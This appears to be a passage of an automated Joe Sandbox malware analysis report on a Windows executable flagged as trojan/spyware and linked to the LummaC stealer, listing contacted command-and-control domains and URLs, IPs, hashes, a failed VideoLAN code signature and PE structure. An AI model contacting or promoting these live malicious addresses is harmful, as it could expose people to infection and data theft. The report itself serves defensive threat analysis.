https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclSecurity.	0%	Avira URL Cloud	safe
https://erectystickj.click/apip	100%	Avira URL Cloud	malware
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclLogic.pas	0%	Avira URL Cloud	safe
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclIniFiles.p	0%	Avira URL Cloud	safe
https://erectystickj.click/api	100%	Avira URL Cloud	malware
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclStrings.pa	0%	Avira URL Cloud	safe
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclDateTime.p	0%	Avira URL Cloud	safe
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclConsole.p	0%	Avira URL Cloud	safe
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclStreams.pa	0%	Avira URL Cloud	safe
erectystickj.click	100%	Avira URL Cloud	malware
https://erectystickj.click/rl#	100%	Avira URL Cloud	malware
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclMath.pas	0%	Avira URL Cloud	safe
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclFileUtils.	0%	Avira URL Cloud	safe
https://erectystickj.click/apisT	100%	Avira URL Cloud	malware
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclSynch.pas	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
erectystickj.click	172.67.154.166	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
necklacebudi.lat	false		high
aspecteirs.lat	false		high
sustainskelet.lat	false		high
crosshuaht.lat	false		high
rapeflowwj.lat	false		high
https://erectystickj.click/api	true	Avira URL Cloud: malware	unknown
energyaffai.lat	false		high
erectystickj.click	true	Avira URL Cloud: malware	unknown
grannyejh.lat	false		high
discokeyus.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclRegistry.	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://erectystickj.click/apiPr39	RIMz2N1u5y.exe, 00000000.00000003.2418065735.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2370063721.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2385586543.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2338758204.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2339765388.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2364517659.00000000009DC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://erectystickj.click/1E	RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2338758204.00000000009E2000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2339765388.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2364517659.00000000009E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclResources.	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	RIMz2N1u5y.exe, 00000000.00000003.2336994289.00000000009F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclUnitVersio	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://erectystickj.click/apiY	RIMz2N1u5y.exe, 00000000.00000003.2265320671.0000000000975000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclBase.pas	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclMime.pas	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://erectystickj.click/QE	RIMz2N1u5y.exe, 00000000.00000003.2385586543.00000000009E2000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2418065735.00000000009E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclShell.pas	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://erectystickj.click/apiNGI	RIMz2N1u5y.exe, 00000000.00000003.2418065735.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2385586543.00000000009DC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://erectystickj.click/	RIMz2N1u5y.exe, 00000000.00000002.2441834576.0000000000959000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclSysInfo.pa	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclWin32.pas	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://erectystickj.click/QD	RIMz2N1u5y.exe, 00000000.00000003.2385586543.00000000009E2000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2418065735.00000000009E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://erectystickj.click/apiWine9	RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009DC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	RIMz2N1u5y.exe, 00000000.00000003.2313513999.0000000003731000.00000004.00000800.00020000.00000000.sdmp	false		high
https://erectystickj.click/apidb	RIMz2N1u5y.exe, 00000000.00000003.2418065735.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2370063721.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2385586543.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2364517659.00000000009DC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.mozilla.or	RIMz2N1u5y.exe, 00000000.00000003.2313371708.0000000003648000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.giantmatrix.com/sp/getdip.php	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://erectystickj.click	RIMz2N1u5y.exe, 00000000.00000003.2370565230.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://erectystickj.click/apiL	RIMz2N1u5y.exe, 00000000.00000003.2337043416.000000000361A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://erectystickj.click:443/api	RIMz2N1u5y.exe, 00000000.00000003.2385586543.00000000009C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/Jcl8087.pas	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclSysUtils.p	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://erectystickj.click/apip	RIMz2N1u5y.exe, 00000000.00000003.2265320671.0000000000975000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclWideString	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclRTTI.pas	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://erectystickj.click/api1wq#	RIMz2N1u5y.exe, 00000000.00000003.2265320671.0000000000958000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	RIMz2N1u5y.exe, 00000000.00000003.2336994289.00000000009F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclSecurity.	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	RIMz2N1u5y.exe, 00000000.00000003.2336994289.00000000009F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclIniFiles.p	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclLogic.pas	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclStreams.pa	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclStrings.pa	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	RIMz2N1u5y.exe, 00000000.00000003.2313513999.0000000003731000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	RIMz2N1u5y.exe, 00000000.00000003.2336994289.00000000009F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclDateTime.p	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclConsole.p	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://erectystickj.click/rl#	RIMz2N1u5y.exe, 00000000.00000003.2364685948.0000000000959000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclFileUtils.	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
http://crl.micro	RIMz2N1u5y.exe, 00000000.00000003.2265320671.0000000000975000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	RIMz2N1u5y.exe, 00000000.00000003.2336994289.00000000009F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclMath.pas	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	RIMz2N1u5y.exe, 00000000.00000003.2336994289.00000000009F5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://erectystickj.click/apisT	RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclSynch.pas	RIMz2N1u5y.exe	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	RIMz2N1u5y.exe, 00000000.00000003.2336994289.00000000009F5000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.154.166	erectystickj.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580856
Start date and time:	2024-12-26 12:07:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RIMz2N1u5y.exe renamed because original name is a hash value
Original Sample Name:	0afffc327a38bdc6812b51507cacdcbe.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 8 Number of non-executed functions: 104
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:08:10	API Interceptor	8x Sleep call for process: RIMz2N1u5y.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.154.166	Echelon.exe	Get hash	malicious	LummaC Stealer	Browse
	Millich Law.pdf	Get hash	malicious	HTMLPhisher	Browse
	https://docs-paymentreceipts.info	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
erectystickj.click	Echelon.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.154.166

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	5RRVBiCpFI.exe	Get hash	malicious	LummaC	Browse	104.21.42.145
	MPySEh8HaF.exe	Get hash	malicious	LummaC	Browse	172.67.180.113
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	67VB5TS184.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	http://booking.extranetguests.com/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.67.220.52
	ciwa.mp4.hta	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.94.92
	Google Authenticator You're trying to sign in from a new location.msg	Get hash	malicious	Unknown	Browse	162.159.128.61
	xd.arm7.elf	Get hash	malicious	Mirai	Browse	162.159.16.108
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	5RRVBiCpFI.exe	Get hash	malicious	LummaC	Browse	172.67.154.166
	MPySEh8HaF.exe	Get hash	malicious	LummaC	Browse	172.67.154.166
	Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse	172.67.154.166
	ciwa.mp4.hta	Get hash	malicious	LummaC, PureLog Stealer	Browse	172.67.154.166
	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.154.166
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.154.166
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.154.166
	SET_UP.exe	Get hash	malicious	LummaC	Browse	172.67.154.166
	00000.ps1	Get hash	malicious	LummaC	Browse	172.67.154.166

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.998351449798508
TrID:	Win32 Executable (generic) a (10002005/4) 99.38% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win32 Executable Delphi generic (14689/80) 0.15% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	RIMz2N1u5y.exe
File size:	1'791'344 bytes
MD5:	0afffc327a38bdc6812b51507cacdcbe
SHA1:	be48f9c9d7c0b60207044719d2106e99b1b27f5b
SHA256:	a35b13603bd53856e24f0cdd8273b5a307d29b671cba0de80b3af85e4db6ed5a
SHA512:	d06d4750b5947ef93f545746e63526e0d8328232be0f6d2ba402033193d829b3c84d51e8ecd33673246306c7f3102aa1b21aa2380fa1afa34f76376798fbb08d
SSDEEP:	24576:6NeOTogDUf5nzEYIrSOCAeiyxuO+wzaSP9/jYpdkp+bGoo5mYwNhmOM+BA0U:6MOEgW5nzEYIrZeiyHagJZ0GNlqhhBm
TLSH:	FC859E22F6814877E63B2A395C97678D5839BF512F18A80F27E51E4CEF397823C25247
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	daeefcec6470b059

Static PE Info

General

Entrypoint:	0x5241cc
Entrypoint Section:	CODE
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b428f94ad6be53cc2d17f6f39028fd8b

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	07/06/2024 02:00:00 09/06/2027 01:59:59
Subject Chain	CN=VideoLAN, O=VideoLAN, L=Paris, C=FR
Version:	3
Thumbprint MD5:	E995C628AAD797E68CAE9D6374BC8ACE
Thumbprint SHA-1:	CCF8C4F9272D8A25477AF13EC71F97A3027C7319
Thumbprint SHA-256:	13D255CB1919425FC94170917F458E0CEC043372B844B95AA70C9E6B488E1909
Serial:	09D08EBDA06BE07C815EA7AF25EF6875

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
push ebx
mov eax, 00523AF4h
call 00007F74B4E63C04h
push 0052424Ch
push FFFFFFFFh
push 00000000h
call 00007F74B4E63FB6h
mov ebx, eax
test ebx, ebx
je 00007F74B4F80D56h
call 00007F74B4E640DBh
test eax, eax
jne 00007F74B4F80D4Dh
mov eax, dword ptr [0052B238h]
mov eax, dword ptr [eax]
call 00007F74B4ED501Bh
mov eax, dword ptr [0052B238h]
mov eax, dword ptr [eax]
mov edx, 00524264h
call 00007F74B4ED4AAEh
mov ecx, dword ptr [0052B5C4h]
mov eax, dword ptr [0052B238h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0051FEB0h]
call 00007F74B4ED5012h
mov eax, dword ptr [0052B238h]
mov eax, dword ptr [eax]
call 00007F74B4ED509Ah
test ebx, ebx
je 00007F74B4F80D08h
push ebx
call 00007F74B4E63F2Ch
pop ebx
call 00007F74B4E61402h
add byte ptr [ecx+6Eh], al
je 00007F74B4F80D6Bh
push esp
jc 00007F74B4F80D63h
arpl word ptr [ebx+73h], bp
dec esp
push ebp
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x136000	0x37b6	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14f000	0x6f400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1afa00	0x5b70	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x13c000	0x12adc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x13b000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x123280	0x123400	45bc4ac3f1cc7765fe8b8902cb62ebe3	False	0.45875134120171673	data	6.482800368522281	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x125000	0x6628	0x6800	8143af87231457316ef639168dc1eace	False	0.39224008413461536	data	4.4751818109925985	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x12c000	0x9995	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x136000	0x37b6	0x3800	7a3a95e47ac9188bde88b3791bb07696	False	0.357421875	data	4.9930533387998945	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x13a000	0x10	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x13b000	0x18	0x200	c2d6eaf3284f8ad317554d46e2e2da6b	False	0.05078125	data	0.2069200177871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x13c000	0x12adc	0x12c00	f6ffe2e684a818ae911ae4b026d07990	False	0.541640625	data	6.662269937025544	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x14f000	0x6f400	0x6f400	28e2bec88f8bb41d0799fd10dba5f0bd	False	0.5856982970505618	data	7.431820832249136	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x1509a0	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	German	Germany	0.3961038961038961
RT_CURSOR	0x150ad4	0x134	data			0.4642857142857143
RT_CURSOR	0x150c08	0x134	data			0.4805194805194805
RT_CURSOR	0x150d3c	0x134	data			0.38311688311688313
RT_CURSOR	0x150e70	0x134	data			0.36038961038961037
RT_CURSOR	0x150fa4	0x134	data			0.4090909090909091
RT_CURSOR	0x1510d8	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_CURSOR	0x15120c	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	German	Germany	0.31493506493506496
RT_CURSOR	0x151340	0x134	data	English	United States	0.38961038961038963
RT_CURSOR	0x151474	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.38636363636363635
RT_BITMAP	0x1515a8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
